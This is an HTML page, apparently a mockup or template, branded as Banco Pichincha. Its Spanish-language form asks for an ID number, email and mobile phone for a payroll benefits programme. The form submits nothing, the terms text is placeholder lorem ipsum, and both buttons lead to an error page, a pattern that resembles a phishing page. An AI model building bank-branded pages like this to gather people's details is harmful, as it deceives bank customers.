<!DOCTYPE html>
<html>
<head>
	<meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <meta name="format-detection" content="telephone=no" />
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no, minimal-ui"/>
    <link href="css/bootstrap.min.css" rel="stylesheet" type="text/css" />
    <link href="css/idangerous.swiper.css" rel="stylesheet" type="text/css" />
    <link href="css/font-awesome.min.css" rel="stylesheet" type="text/css" />
    <link href="css/style.css" rel="stylesheet" type="text/css" />
    <link href="fonts/fonts.css" rel="stylesheet" type="text/css" charset="utf-8" />

    <link rel="shortcut icon" href="img/favicon.ico" />
    <title>Banco Pichincha</title>

<style>
    .boton-rojo{
        line-height: 5px !important;
        border-radius: 4px !important;
        width: 100%;
        padding: 18px !important;
    }

    .boton-envio{
        line-height: 5px !important;
        border-radius: 4px !important;
        width: 150px !important;
        padding: 18px !important;
        margin-left: 5px;
    }
    
    .caja-login{
        width:100%; 
        background-color: rgba(204, 204, 204, 0.12); 
        border-radius:3px !important;
    }

    .fondo.login .content-push{
        background-color: #f5d933;
        background-repeat: no-repeat !important;
        background-size:cover;
        background-position: top center;
        min-height: 700px;
    }

    .caja-contrasenia, .caja-email, .caja-usuario, .select_top{
        width: 100%;
        border-radius: 3px !important;
        padding-right: 25px!important;
        background-size: 20px;
        background-repeat: no-repeat;
        background-position: 5%;
        background-color: #fff!important;
        padding-left: 50px;
    }
    .caja-email{
        background: url("img/icon_mail.png");
        background-size: 20px;
        background-repeat: no-repeat;
        background-position: 5%;
    }
    .caja-usuario{
        background-size: 25px;
        background-repeat: no-repeat;
        background-position: 5%;
    }

    .caja-contrasenia{
        background-size: 20px;
        background-repeat: no-repeat;
        background-position: 5%;
        padding-left: 20px;
    }

    .caja-confirmacion {
        width: 100%;
        height: auto !important;
        background-color:rgba(255, 255, 255, 0.51);
        border-radius: 8px !important;
        font-size: 15px !important;
        text-align: center;
        padding: 20px;
        font-family: 'Prelo-BookItalic';
    }
    .overlay-popup p{font-size: 14px; margin-bottom: 15px;color: #808080}

    .a_link{
        color: #2d1e01;
        font-size: 13px;
        
    }
    .forms-login{background:#fff; padding: 20px 30px;}
    .login-box span {font-size: 22px;}
    .login-box select{background-color: #e7ded8;font-size: 13px;opacity: 0.7; padding-left: 20px;background-position: 95%; color: inherit; margin-left: 0;color: #2d1f02; }
</style>
</head>

<body class="style-10 fondo login">
    <div class="container-fluid">
        <div class="information-blocks content-push">
            <div class="row">
                    <div class="login-box login-fondo col-lg-4 col-lg-offset-4 col-sm-8 col-sm-offset-2 col-xs-12" align="center" style="border:0 !important;">
                        <div class="article-container style-1" style="text-align: center; margin-top:0; margin-bottom:15px;">
                            <p style="font-size: 16px;line-height: 20px;">Para disfrutar de los Privilegios Nómina de Banco<br>Pichincha por favor registre los siguientes campos:</p>
                        <div class="forms-login">
                            <form>
                                <input class="simple-field caja-contrasenia" type="email" placeholder="74964435"/>
                                <input class="simple-field caja-contrasenia" type="email" placeholder="Correo electrónico"/>
                                <input class="simple-field caja-contrasenia" type="text" placeholder="Celular"/>
                                <input type="checkbox" name="" value="" style="float:left; vertical-align:center"><p>He leído y acepto los <a class="open-terminos" id="mostrar-terminos" style="color:#5e5d5d; text-decoration:underline;">términos y condiciones</a>.</p>
                                <a href="login_error.html" class="button style-12 boton-rojo">Aceptar</a>
                                <a href="login_error.html" class="button style-11 boton-rojo">Cancelar</a>
                            </form>
                        </div>
                    </div>
            </div>
        </div>
    </div>

    <!--Modal-->
    <div id="terminos" class="overlay-popup">
        <div class="overflow">
            <div class="table-view">
                <div class="cell-view">
                    <div class="close-layer"></div>
                        <div class="popup-container small">
                        <div class="row">
                            <div class="col-sm-12 col-xs-8 information-entry">
                                <div class="product-detail-box">
                                    <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptas tenetur illo corrupti nihil ad vel sunt, voluptatum commodi minus quidem perspiciatis totam quasi aut eveniet eum, officiis excepturi debitis perferendis.</p>
                                    <p>Hic illum animi voluptatem dolores corporis deleniti nam repellendus numquam debitis error, est eaque similique, laboriosam blanditiis quo tenetur vel expedita voluptas cumque molestiae sint tempora ullam. Ut, harum tempore?. Lorem ipsum dolor sit amet, consectetur adipisicing elit. Reprehenderit doloremque dignissimos minus blanditiis quis velit quod distinctio. Voluptatem modi consequuntur veritatis enim esse. Magnam voluptas, sed illo fugit, tenetur molestiae.</p>
                                    <a href="#" class="button style-10" style="float:right;">ACEPTAR</a>
                                </div>
                            </div>
                        </div>
                        <div class="close-popup"></div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <script src="js/jquery-2.1.3.min.js"></script>
    <script src="js/idangerous.swiper.min.js"></script>
    <script src="js/global.js"></script>

    <!-- custom scrollbar -->
    <script src="js/jquery.mousewheel.js"></script>
    <script src="js/jquery.jscrollpane.min.js"></script>

</body>
</html>